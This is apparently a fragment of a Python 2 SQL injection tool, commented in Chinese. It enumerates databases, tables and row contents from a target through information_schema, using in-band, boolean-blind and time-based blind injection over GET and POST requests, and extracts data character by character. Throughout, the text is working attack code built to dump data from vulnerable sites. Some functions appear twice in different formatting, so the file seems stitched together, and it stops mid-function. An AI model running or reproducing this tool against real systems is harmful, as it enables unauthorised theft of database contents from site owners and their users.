def get_content_count(self, database_name, table_name):
# 开始注内容
logger.debug("Start sqli table %s content amount..." % table_name)
logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
# 注数据的数量
content_count = normal_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Content account sqli success...The count is %d..." % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
retVal = build_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
content_count = int(retVal)
logger.debug("Content account sqli success...The content_count is %d..." % content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
retVal = time_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
content_count = int(retVal)
logger.debug("Content account sqli success...The content_count is %d..." % content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
def get_database(self):
if self.sqlirequest == "GET":
logger.debug("The sqlirequest is %s, start sqli databases..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
# 先注databases的数量
databases_number = normal_injection(
select='COUNT(SCHEMA_NAME)',
source='information_schema.SCHEMATA',
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Databases amount sqli success...The databases_number is %d..."
% databases_number)
print "[*] databases_number: %d" % databases_number
# 每个循环跑一次databases的数据
for i in trange(int(databases_number),
desc="Database sqli...",
leave=False,
disable=True):
# 首先是database name的长度
logger.debug("Start %dth database length sqli..." %
(i + 1))
databases_name_len = normal_injection(
select='length(SCHEMA_NAME)',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注database name
logger.debug("Start %dth database name sqli..." % (i + 1))
databases_name = normal_injection(
select='SCHEMA_NAME',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = build_injection(select="COUNT(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug(
"Databases amount sqli success...The databases_number is %d..."
% databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." %
(i + 1))
# 然后注databases_name 的 length
retVal = build_injection(
select="length(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注databases名字
# 清空database_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len),
desc='%dth Database sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(SCHEMA_NAME," +
repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = time_injection(select="COUNT(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug(
"Databases amount sqli success...The databases_number is %d..."
% databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." %
(i + 1))
# 然后注databases_name 的 length
retVal = time_injection(
select="length(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注databases名字
# 清空databases_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len),
desc='%dth Database sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(SCHEMA_NAME," +
repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
# 然后是post
elif self.sqlirequest == "POST":
logger.debug("The sqlirequest is %s, start sqli databases..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
# 先注databases的数量
databases_number = normal_injection(
select='COUNT(SCHEMA_NAME)',
source='information_schema.SCHEMATA',
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Databases account sqli success...The databases_number is %d..."
% databases_number)
print "[*] databases_number: %d" % databases_number
# 每个循环跑一次databases的数据
for i in trange(int(databases_number),
desc="Database sqli...",
leave=False,
disable=True):
# 首先是database name的长度
databases_name_len = normal_injection(
select='length(SCHEMA_NAME)',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注database name
logger.debug("Start %dth database name sqli..." % (i + 1))
databases_name = normal_injection(
select='SCHEMA_NAME',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = build_injection(select="COUNT(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug(
"Databases amount sqli success...The databases_number is %d..."
% databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
# 然后注databases_name 的 length
logger.debug("Start %dth database length sqli..." %
(i + 1))
retVal = build_injection(
select="length(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注databases名字
# 清空databases_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len),
desc='%dth Database sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(SCHEMA_NAME," +
repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = time_injection(select="COUNT(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug(
"Databases amount sqli success...The databases_number is %d..."
% databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
# 然后注databases_number 的length
logger.debug("Start %dth database length sqli..." %
(i + 1))
retVal = time_injection(
select="length(SCHEMA_NAME)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug(
"%dth Databases name length sqli success...The databases_name_len is %d..."
% ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" %
((i + 1), databases_name_len))
# 然后注databases名字
# 清空databases_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len),
desc='%dth Database sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(SCHEMA_NAME," +
repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..."
% ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" %
((i + 1), databases_name))
databases_name = ','.join(self.databases_name)
print "[*] databases_name list: " + databases_name
def get_tables(self):
# 若databases_name未设置,就跑一下
if len(self.databases_name) == 0:
logger.debug("Set the parameters of the self.databases_name...")
SqliDatabases.get_database(self)
# 每个databases_name需要跑一次tables_name
for database_name in self.databases_name:
# 开始跑database_name
logger.debug("Start sqli databases %s's tables_name" %
database_name)
tables_name = []
if self.sqlirequest == "GET":
logger.debug("The sqlirequest is %s, start sqli tables..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
# 先注tables的数量
tables_number = normal_injection(
select='COUNT(*)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Table account sqli success...The tables_number is %d..."
% tables_number)
print "[*] tables_number: %d" % tables_number
# 每个循环跑一次tables的数据
for i in trange(int(tables_number),
desc="Table sqli...",
leave=False,
disable=True):
# 首先是tablename的长度
logger.debug("Start %dth table length sqli..." %
(i + 1))
table_name_len = normal_injection(
select='length(table_name)',
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tablename
logger.debug("Start %dth table name sqli..." % (i + 1))
table_name = normal_injection(
select='table_name',
source='information_schema.tables',
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = build_injection(
select="COUNT(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug(
"Tables amount sqli success...The tables_number is %d..."
% tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_name 的 length
logger.debug("Start %dth table length sqli..." %
(i + 1))
retVal = build_injection(
select="length(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len),
desc='%dth Table sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(table_name," +
repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = time_injection(select="COUNT(table_name)",
source="information_schema.tables",
conditions="table_schema = '" +
database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug(
"Tables amount sqli success...The tables_number is %d..."
% tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_number 的length
logger.debug("Start %dth table length sqli..." %
(i + 1))
retVal = time_injection(
select="length(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len),
desc='%dth Table sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(table_name," +
repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
# 然后是post
elif self.sqlirequest == "POST":
logger.debug("The sqlirequest is %s, start sqli tables..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
# 先注tables的数量
tables_number = normal_injection(
select='COUNT(*)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Table account sqli success...The tables_number is %d..."
% tables_number)
print "[*] tables_number: %d" % tables_number
# 每个循环跑一次tables的数据
for i in trange(int(tables_number),
desc="Table sqli...",
leave=False,
disable=True):
# 首先是tablename的长度
logger.debug("Start %dth table length sqli..." %
(i + 1))
table_name_len = normal_injection(
select='length(table_name)',
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tablename
logger.debug("Start %dth table name sqli..." % (i + 1))
table_name = normal_injection(
select='table_name',
source='information_schema.tables',
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = build_injection(
select="COUNT(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug(
"Tables amount sqli success...The tables_number is %d..."
% tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注table_name 的 length
logger.debug("Start %dth table length sqli..." %
(i + 1))
retVal = build_injection(
select="length(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len),
desc='%dth Table sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(table_name," +
repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = time_injection(select="COUNT(table_name)",
source="information_schema.tables",
conditions="table_schema = '" +
database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug(
"Tables amount sqli success...The tables_number is %d..."
% tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_number 的length
logger.debug("Start %dth table length sqli..." %
(i + 1))
retVal = time_injection(
select="length(table_name)",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug(
"%dth Table name length sqli success...The table_name_len is %d..."
% ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" %
((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len),
desc='%dth Table sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(table_name," +
repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug(
"%dth Table name sqli success...The table_name is %s..."
% ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" %
((i + 1), table_name))
self.tables_name[database_name] = tuple(tables_name)
print "[*] tables_name list: ", self.tables_name
def get_content(self, result, database_name, table_name, column_name, limits):
# 开始注内容
content_len = 0
logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))
logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 注这一条的数据长度
logger.debug("Start %dth content length sqli..." % (limits + 1))
content_len = normal_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data, isCount=True,
sqlirequest=self.sqlirequest
)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content
logger.debug("Start %dth content sqli..." % (limits + 1))
content = normal_injection(select="`" + column_name + "`",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的 length
retVal = build_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data,
lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的length
retVal = time_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False):
retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def get_content(self, result, database_name, table_name, column_name,
limits):
# 开始注内容
content_len = 0
logger.debug("Start sqli table %s column %s limit %d content..." %
(table_name, column_name, limits))
logger.debug("The sqlirequest is %s, start sqli content..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 注这一条的数据长度
logger.debug("Start %dth content length sqli..." % (limits + 1))
content_len = normal_injection(
select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Content length sqli success...now is limit %d, The content_len is %d..."
% (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content
logger.debug("Start %dth content sqli..." % (limits + 1))
content = normal_injection(select="`" + column_name + "`",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug("Content sqli success...The content is %s..." %
content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的 length
retVal = build_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug(
"Content length sqli success...now is limit %d, The content_len is %d..."
% (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len),
desc='%dth Content sqli' % (limits + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(`" + column_name + "`," +
repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." %
content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的length
retVal = time_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug(
"Content length sqli success...now is limit %d, The content_len is %d..."
% (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len),
desc='%dth Database sqli' % (limits + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(`" + column_name + "`," +
repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." %
content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
logger.debug("Sqli table %s column %s limit %d success..." %
(table_name, column_name, limits))
def get_content_count(self, database_name, table_name):
# 开始注内容
logger.debug("Start sqli table %s content amount..." % table_name)
logger.debug("The sqlirequest is %s, start sqli content..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." %
table_name)
# 注数据的数量
content_count = normal_injection(select="count(*)",
source=database_name + "." +
table_name,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug("Content account sqli success...The count is %d..." %
content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." %
table_name)
retVal = build_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
content_count = int(retVal)
logger.debug(
"Content account sqli success...The content_count is %d..." %
content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." %
table_name)
retVal = time_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
content_count = int(retVal)
